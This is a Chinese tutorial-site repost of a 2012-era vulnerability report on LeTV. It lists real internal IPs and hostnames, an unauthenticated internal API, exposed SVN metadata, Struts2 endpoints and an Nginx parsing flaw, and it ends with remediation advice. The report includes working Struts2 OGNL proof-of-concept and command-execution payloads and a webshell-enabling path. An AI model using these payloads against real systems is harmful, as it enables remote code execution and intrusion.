网站地图    收藏   

主页 > 后端 > 网站安全 >

乐视网漏洞合集及修复方案 - 网站安全 - 自学p

来源:自学PHP网    时间:2015-04-17 14:11 作者: 阅读:

[导读] 1,内部查询接口无验证且匿名开放http://123.126.33.234:8080/api/statistic/2,二处内部系统SVN泄露DNS管理系统http://123.126.33.236/pages/.svn/entries视频审核管理系统http://vas.letv.com/.svn/entries通过......

1,内部查询接口无验证且匿名开放
 
http://123.126.33.234:8080/api/statistic/
 
 




 
2,二处内部系统SVN泄露
DNS管理系统
 
http://123.126.33.236/pages/.svn/entries
视频审核管理系统
 
http://vas.letv.com/.svn/entries
通过SVN遍历的时候发现tools下的大部分工具可直接操作,猜测应该可以向某文件发送post来删除视频
 
 
 
3,Struts2远程代码执行
 
http://bd.enp.letv.com/agents/list.action
 
 
 
 
http://web.iptv.letv.com/iptv2/view/content_search3DJson.action
 
 
 
 
http://app.iptv.letv.com/iptv2/view/searchPublicInfo.action同上
Poc www.2cto.com
 
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.sleep(999999999)')(\u0023rt\u003d@java.lang.Thread@currentThread()))=1
Exp
 
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('\u0023rt.exec(%22执行命令%22)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
4,Nginx解析漏洞
乐视TV(hdtv.letv.com)用的是开源ecshop改的,同时该站点下提供了一个供用户讨论的Discuz! X2论坛,这也是导致攻击者上传图片通过解析漏洞直接拿到webshell,从而达到各种目的,亲,Google site:hdtv.letv.com/bbs/ 搜索一下你就明白了,估计也是你们知道有问题了才限制了上传文件夹的权限,建议针对这个小问题升级一下和排查一下后门
 
 
 
 
http://hdtv.letv.com/bbs/robots.txt/.php
修复方案:1,内部系统还是添加一下验证吧
2,对svn目录限制访问或删除
3,及时升级线上的struts2
4,升级Nginx或参考 www.2cto.com/Article/201007/51735.html 2012-3-31
 

作者 Z-0ne

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论